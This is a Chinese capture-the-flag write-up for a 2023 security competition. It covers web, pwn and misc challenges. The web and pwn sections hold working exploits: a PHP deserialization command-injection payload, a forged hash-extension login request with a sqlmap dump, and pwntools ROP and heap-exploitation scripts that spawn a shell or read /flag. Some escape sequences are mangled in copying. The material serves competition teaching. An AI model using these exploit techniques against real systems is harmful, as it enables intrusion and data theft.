WEB
eaaeval
访问连接,源代码提示
目录泄露 www.zip
得到源码
<?php
class Flag{
public $a;
public $b;
public function __construct(){
$this->a = 'admin';
$this->b = 'admin';
}
public function __destruct(){
if(!preg_match("/flag|system|php|cat|tac|shell|sort/i", $this->a) && !preg_match("/flag|system|php|cat|tac|shell|sort/i", $this->b)){
system($this->a.' '.$this->b);
}else{
echo "again?";
}
}
}
$wzbz = $_GET['wzbz'];
unserialize($wzbz);
?>
进行编写如下exp,直接获取flag
<?php
class Flag{
public $a;
public $b;
public function __construct(){
$this->a = 't''ac /f*;';
$this->b = 'whoami';
}
}
$a =new Flag();
echo urlencode(serialize($a));
exp如下,传参给wzbz 获取flag
O%3A4%3A%22Flag%22%3A2%3A%7Bs%3A1%3A%22a%22%3Bs%3A10%3A%22t%27%27ac+%2Ff%2A%3B%22%3Bs%3A1%3A%22b%22%3Bs%3A6%3A%22whoami%22%3B%7D
upload_shell
hashpump伪造 upload->sql注入
将伪造生成后的值,进行赋值
POST /login.php HTTP/1.1
Host: 80.endpoint-01267626a6c345c9a82480694ffffcbb.m.ins.cloud.dasctf.com:81
Content-Length: 146
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://80.endpoint-01267626a6c345c9a82480694ffffcbb.m.ins.cloud.dasctf.com:81
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://80.endpoint-01267626a6c345c9a82480694ffffcbb.m.ins.cloud.dasctf.com:81/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=1a0230c0647489bb0b5610b287d4f3e2; source=a1f278b3d6fef96d7b8805b5e17351ee
Connection: close
username=admin&password=password%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%D8%00%00%00%00%00%00%00abc
访问来到 upload.php
保存为文件直接sqlmap获取flag
python3 sqlmap.py -r sql.txt -D test -T flag -C flag --dump
PWN
ez_base
代码审计
整体就是将字符串通过base64加密,或者 base64解密为字符串
漏洞在于base64解密的时候,不会验证我们写入的长度,导致解密完之后栈溢出
思路
因为我们溢出的空间有限,就通过栈迁移来解决
控制rbp为bss上的值,然后就可以重新利用,然后构造read往bss上写,然后在构造execve("/bin/sh",0,0)
from pwn import*
import base64
context(arch='i386', os='linux',log_level="debug")
context.terminal=["wt.exe","wsl.exe"]
#libc = ELF("../libc/")
# libc = ELF("./libc-so.6")
"""""
def xxx():
p.sendlineafter("")
p.sendlineafter("")
p.sendlineafter("")
"""
def get_p(name):
global p,elf
# p = process(name)
p = remote("tcp.cloud.dasctf.com",24889)
elf = ELF(name)
get_p("./base")
pop_rdi =0x0000000000402bfe
pop_rsi = 0x00000000004070ff
pop_rdx = 0x0000000000456be2
pop_rax = 0x000000000041e08a
syscall = 0x00000000004e30d6
leave_ret = 0x0000000000404633
bss = 0x005C7610 + 0x100
payload = b"A"*0x20 + p64(bss) + p64(0x0000404AED)
payload = base64.b64encode(payload)
p.sendlineafter("2:decode",'2')
p.sendlineafter("cin en_str:",payload)
payload = p64(pop_rdi) + p64(0) + p64(syscall) + p64(0) + p64(bss-0x28) + p64(pop_rsi) + p64(bss-8) + p64(pop_rdx) + p64(0x200) + p64(0x0000000000404633)
payload = base64.b64encode(payload)
p.sendlineafter("cin en_str:",payload)
# gdb.attach(p,"b *0x0404B5D")
sleep(2)
payload = p64(pop_rax) + p64(0x3b) + p64(pop_rdi) + p64(bss+0x40) + p64(pop_rsi) + p64(0) + p64(pop_rdx) +p64(0) + p64(syscall) + b"/bin/shx00"
p.send(payload)
p.interactive()
bad apple
沙盒
代码审计
标准的菜单
漏洞在这UAF
只能泄露一次
思路
通过一次泄露,打印出来heap和libc的地址,我们只需要构造一下large bin,做两个large chunk,打印其中一个即可,泄露出来,然后就是常规的house of apple的利用手法,第一次将stderr覆盖为我们的heap地址,然后构造fake_io_file,然后第二次large bin攻击的时候需要修改topchunk,触发IO_链,然后在堆上布置我们的orw的ROP即可
exp
from importlib.resources import contents
from pwn import*
context(arch='i386', os='linux',log_level="debug")
context.terminal=["wt.exe","wsl.exe"]
#libc = ELF("../libc/")
libc = ELF("./libc-so.6")
"""""
def xxx():
p.sendlineafter("")
p.sendlineafter("")
p.sendlineafter("")
"""
def get_p(name):
global p,elf
# p = process(["./ld-linux-x86-64.so.2", "./pwn"],
# env={"LD_PRELOAD":"./libc.so.6 "})
p = remote("tcp.cloud.dasctf.com",28232)
elf = ELF(name)
def add(choice,content="AAA"):
p.sendlineafter("Choice: ", b'1')
p.sendlineafter("Apple size: ", str(choice))
p.sendafter("Updata a sign to your apple: ",content)
def dele(num):
p.sendlineafter("Choice: ", b'4')
p.sendlineafter("Which one: ", str(num))
def edit(num, data):
p.sendlineafter("Choice: ", b'2')
p.sendlineafter("Which one: ", str(num))
p.sendafter("Content: ", data)
def show(num):
p.sendlineafter("Choice: ", b'3')
p.sendlineafter("Which one: ", str(num))
get_p("./pwn")
add(0x438, b'colin') # 0
add(0x440, b'colin') # 1
add(0x428, b'colin') # 2
add(0x440, b'colin') # 3
dele(0)
add(0x440, b'colin') # 4
dele(3)
add(0x450,"AAA") # 5
show(0)
libc.address = u64(p.recvuntil("x7f")[-6:].ljust(0x8,b"x00")) - 0x21a0e0
p.recv(2)
stderr = libc.symbols['stderr']
tcbhead_t = libc.address - 0x28C0
_IO_cookie_jumps = libc.address + 0x215B80
print(hex(_IO_cookie_jumps))
heap_base = u64(p.recv(8)) - 0xf50
pop_rdi =libc.address + 0x000000000002a3e5 # pop rdi ; ret
pop_rsi = libc.address + 0x000000000002be51 # pop rsi ; ret
pop_rdx_r12 = libc.address +0x000000000011f497 # pop rdx ; pop r12 ; ret
pop_rax = libc.address + 0x0000000000045eb0 # pop rax; ret;
ret = libc.address + 0x0000000000029cd6# ret;
stderr=libc.sym['stderr']
setcontext=libc.sym['setcontext']
close=libc.sym['close']
read=libc.sym['read']
puts=libc.sym['puts']
syscall_ret=libc.address + 0x0000000000091396 # syscall; ret;
_IO_wfile_jumps = libc.address +0x2160c0
fake_io_addr = heap_base + 0x290
rop_addr = heap_base + 0x20d0
flag_addr = heap_base + 0x2168
gadget=libc.address+0x11388f
print(hex(libc.address))
print(hex(heap_base))
fake_struct = p64(0) #_IO_read_end
fake_struct += p64(0) #_IO_read_base
fake_struct += p64(0) #_IO_write_base
fake_struct += p64(0) #_IO_write_ptr
fake_struct += p64(0) #_IO_write_end
fake_struct += p64(0) #_IO_buf_base
fake_struct += p64(1) #_IO_buf_end
fake_struct += p64(0) #_IO_save_base
fake_struct += p64(fake_io_addr + 0xb0) #_IO_backup_base = rdx
fake_struct += p64(setcontext + 61) #_IO_save_end = call_addr
fake_struct += p64(0) #_markers
fake_struct += p64(0) #_chain
fake_struct += p64(0) #_fileno
fake_struct += p64(0) #_old_offset
fake_struct += p64(0) #_cur_column
fake_struct += p64(heap_base + 0x200) #_lock = heap_addr or writeable libc_addr
fake_struct += p64(0) #_offset
fake_struct += p64(0) #_codecvx
fake_struct += p64(fake_io_addr + 0x30) #_wfile_data rax1
fake_struct += p64(0) #_freers_list
fake_struct += p64(0) #_freers_buf
fake_struct += p64(0) #__pad5
fake_struct += p32(0) #_mode
fake_struct += b"x00"*20 #_unused2
fake_struct += p64(_IO_wfile_jumps + 0x10) #vatable
fake_struct += p64(0)*6 #padding
fake_struct += p64(fake_io_addr + 0x40) #rax2 -> to make [rax+0x18] = setcontext + 61
print(hex(len(fake_struct)))
payload = fake_struct + p64(0)*7 + p64(rop_addr) + p64(ret)
add(0x438,payload) # 6
dele(0)
edit(3,p64(libc.address+0x21a0e0)*2 + p64(heap_base+0x290) + p64(stderr-0x20))
add(0x460,"AAAAA") # 7
rop = p64(pop_rdi) + p64(0) + p64(close) #close(0)
rop += p64(pop_rdi) + p64(flag_addr) + p64(pop_rax) + p64(2) + p64(syscall_ret) #open(flag)
rop += p64(pop_rdi) + p64(0) + p64(pop_rsi) + p64(flag_addr+0x10) + p64(pop_rdx_r12) + p64(0x100) + p64(0) + p64(read) #read(0,flag_addr+0x10,0x100)
rop += p64(pop_rdi) + p64(flag_addr+0x10) + p64(puts) #puts(flag_addr+0x10)
add(0x470,rop+b"/flagx00") # 8
add(0x480,b"flag") # 9
add(0x480,b"77777") # 10
add(0x470,b"77777") # 11
dele(9)
add(0x4a0,b"77777") # 12
dele(11)
edit(9,p64(libc.address + 0x21a0f0)*2 + p64(heap_base + 0x2540)+p64(heap_base+0x3790-0x20+3))
p.sendlineafter("Choice: ", b'1')
# gdb.attach(p,"b *&_IO_wfile_overflow")
# sleep(2)
p.sendlineafter("Apple size: ", str(0x4a0))
p.interactive()
MISC
ez_zip
直接用脚本循环解压
import zipfile
name = 'ez_zip' # 设置初始名称
while True:
try:
file = zipfile.ZipFile(name + '.zip', 'r')
file.extractall()
name = file.filelist[0].filename.split('.')[0]
file.close()
except Exception as e:
print("发生错误:", e)
break # 或在此处添加其他错误处理逻辑
得到1.txt
+-+++-++ +-+++++- +-+-++-- +-++++-- +-+-+-++ +-+++--+ +----+-- ++--+++- ++--++++ +--+++-- ++--+-+- ++---+++ ++--++-+ ++--+-+- ++---+++ +--+++-- +--+++-- +--++--+ ++--+++- +--++-+- ++--+--- +--+++-- ++--+--+ ++--++-- ++--+++- +--++-+- ++--+-+- ++---++- ++--+++- ++--+++- +--++-+- +--++-++ ++--+--+ +--++++- +--+++-- +--+++-- ++--+-++ +--++-+- +--++-++ +-----+-
先替换成如下
.-...-.. .-.....- .-.-..-- .-....-- .-.-.-.. .-...--. .----.-- ..--...- ..--.... .--...-- ..--.-.- ..---... ..--..-. ..--.-.- ..---... .--...-- .--...-- .--..--. ..--...- .--..-.- ..--.--- .--...-- ..--.--. ..--..-- ..--...- .--..-.- ..--.-.- ..---..- ..--...- ..--...- .--..-.- .--..-.. ..--.--. .--....- .--...-- .--...-- ..--.-.. .--..-.- .--..-.. .-----.-
使用https://www.lddgo.net/encrypt/morse,得到
%u44%u41%u53%u43%u54%u46%u7b%u31%u30%u63%u35%u38%u32%u35%u38%u63%u63%u66%u31%u65%u37%u63%u36%u33%u31%u65%u35%u39%u31%u31%u65%u64%u36%u61%u63%u63%u34%u65%u64%u7d
转十六进制
4441534354467b31306335383235386363663165376336333165353931316564366163633465647d
# DASCTF{10c58258ccf1e7c631e5911ed6acc4ed}
gb2312-80
看到cipher.txt文件,直接写脚本看点阵
lt = [
[0,0,4080,3072,3072,3072,4032,3680,48,48,48,3120,1632,960,0,0],
[0,0,992,1584,3096,3096,3096,3096,3096,3096,3096,3096,1584,992,0,0],
[0,0,128,896,384,384,384,384,384,384,384,384,384,960,0,0],
...
... # 太长了省略
...
[0,0,992,1584,3096,3096,3096,3096,3096,3096,3096,3096,1584,992,0,0],
[0,0,992,1584,3096,3096,3096,3096,3096,3096,3096,3096,1584,992,0,0],
[0,0,992,1584,3096,3096,3096,3096,3096,3096,3096,3096,1584,992,0,0]
]
with open('final.txt', 'w+', encoding='utf-8') as fp:
for x in lt:
for i in range(16):
s = bin(x[i] & 0xffffffff)
s = s.replace('0b', "").zfill(16)
for j in s:
if j == '1':
fp.write('0'+' ')
else:
fp.write('.'+' ')
fp.write('n')
fp.write('n')
得到数字,手撸转文件
得到一个zip文件,hint.txt和flag.txt
通过hint.txt得到密码
x = [ '0000100000010000111111111111100000010000000100000001000100010000001000010001000000100101000100000011111100010000011001010001010010100101111111100010010000000100001001000010010000100111111101000010010000000100001111000000010000100100000101000000000000001000',
'0000111111100000000010000010000000001000001000000000111111100000000010000010000000001000001000000000111111100000000000000000010011111111111111100000000100000000000010010010000000001001111100000000100100000000000101010000000000100011000001100100000011111100',
'0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011000000000000011110000000000001111000000000000011000000000000000000000000000000110000000000000111100000000000011110000000000000110000000000000000000000000',
'0000000000000000000000000000000000000011110000000000000110000000000000011000000000000001100000000000000110000000000000011000000000000001100000000000000110000000000000011000000000000001100000000000000110000000000000111100000000000000000000000000000000000000',
'0000000000000000000000000000000000011110000000000000110000000000000011000000000000001100000000000000110000000000000011000000000000001100000000000000110000000000000011000000000000001100000010000000110000011000000111111111100000000000000000000000000000000000',
'0000000000000000000000000000000000000011111000000000011000110000000011000001100000011000000011000001100000001100000110000000110000011000000011000001100000001100000110000000110000001100000110000000011000110000000000111110000000000000000000000000000000000000',
'0000000000000000000000000000000000111100000111000001100000001000000110000000100000011000000100000000110000010000000011000010000000001100001000000000011001000000000001100100000000000010100000000000001110000000000000010000000000000000000000000000000000000000',
'0000000000000000000000000000000000011111111110000000110000011000000011000000100000001100000000000000110000100000000011111110000000001100001000000000110000000000000011000000000000001100000010000000110000011000000111111111100000000000000000000000000000000000',
'0000000000000000000000000000000000011110001111000000110000011000000011000001100000001100000110000000110000011000000011111111100000001100000110000000110000011000000011000001100000001100000110000000110000011000000111100011110000000000000000000000000000000000',
'0000000000000000000000000000000000111111111110000010000000011000000000000011000000000000011000000000000011000000000000011000000000000011000000000000011000000000000011000000000000011000000010000011000000011000001111111111100000000000000000000000000000000000',
'0000000000000000000000000000000000011110011111000000110000110000000011000110000000001100110000000000110110000000000011111000000000001101110000000000110011100000000011000111000000001100001110000000110000011100000111100001111000000000000000000000000000000000',
'0000000000000000000000000000000000000000100000000000001110000000000000011000000000000001100000000000000110000000000000011000000000000001100000000000000110000000000000011000000000000001100000000000000110000000000000111100000000000000000000000000000000000000',
'0000000000000000000000000000000000000011110000000000011001100000000011000011000000001100000000000000110111000000000011100110000000001100001100000000110000110000000011000011000000001100001100000000011001100000000000111100000000000000000000000000000000000000'
]
for a in x:
for i in range(len(a)//16):
print(a[i*16:i*16+16].replace('0', '. '))
print()
得到密码:ILOVEHZK16
解压flag.txt
DASCTF{842a99305a07e6183830582d1740c1b1}
原文始发于微信公众号(ACT Team):2023年国家基地“楚慧杯”网络安全实践能力竞赛初赛Writeup
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论